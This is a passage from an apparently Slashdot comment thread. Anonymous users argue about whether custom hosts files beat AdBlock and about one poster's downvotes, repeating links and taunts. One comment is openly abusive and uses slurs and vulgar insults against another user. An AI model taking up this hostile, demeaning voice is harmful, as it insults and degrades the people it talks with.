    You've said that before: How'd yer words taste when ya ate 'em http://it.slashdot.org/comments.pl?sid=3417867&cid=42756893 Sardaukar86? After all, you said people don't like his posts before and yet you are outnumbered in that statement by 250 of your /. peers in that very link. LOL! Disprove apk on hosts files over adblock, ghostery, & dns http://it.slashdot.org/comments.pl?sid=3445509&cid=42831729 then. Good luck. No one can.

  55. Re:Custom hosts = Superior to AdBlock by Anonymous Coward · · Score: 0

    Respond to the point, loser. Don't skip around it like the feeble coward you are.

    Yes - this is Sardaukar86. Are you taking notes on how to not be an AC liar pretending to be someone else yet?

    You have no integrity.

  56. Re:Custom hosts = Superior to AdBlock by Anonymous Coward · · Score: 0

    Disprove apk on hosts files over adblock, ghostery, & dns http://it.slashdot.org/comments.pl?sid=3445509&cid=42831729 then. How'd yer words taste when ya hadda eat 'em Sardaukar86 http://it.slashdot.org/comments.pl?sid=3417867&cid=42756893 on that very same sentiment from you only to have yourself outnumbered nearly 250 to 1? ROTFLMAO!!!

  57. Re:Unjustifiable downmod? A challenge then! by Anonymous Coward · · Score: 0

    Sardaukar86 posting again, seems it's hard to keep up with a psychotic delusional fuckwit like APK when one is limited to 25 posts per day.

    APK, are you still going to play dumb and pretend your problems are technical in nature? Do you still think that proving your silly technical point disproves my point?

    No, it doesn't. You are too stupid to understand this: you get modded down because you are a cunt.

    Don't take my word for it - simply keep posting. Every time you post to a current article, you get downmodded. Thanks for proving my point for me, you stupid cocksucker.

  58. Re:Unjustifiable downmod? A challenge then! by Anonymous Coward · · Score: 0

    Disprove apk on hosts files over adblock, ghostery, & dns http://it.slashdot.org/comments.pl?sid=3445509&cid=42831729 then. How'd yer words taste when ya hadda eat 'em Sardaukar86 http://it.slashdot.org/comments.pl?sid=3417867&cid=42756893 on that very same sentiment from you only to have yourself outnumbered nearly 250 to 1? ROTFLMAO! Posting as ac now too Sardaukar86? LMAO!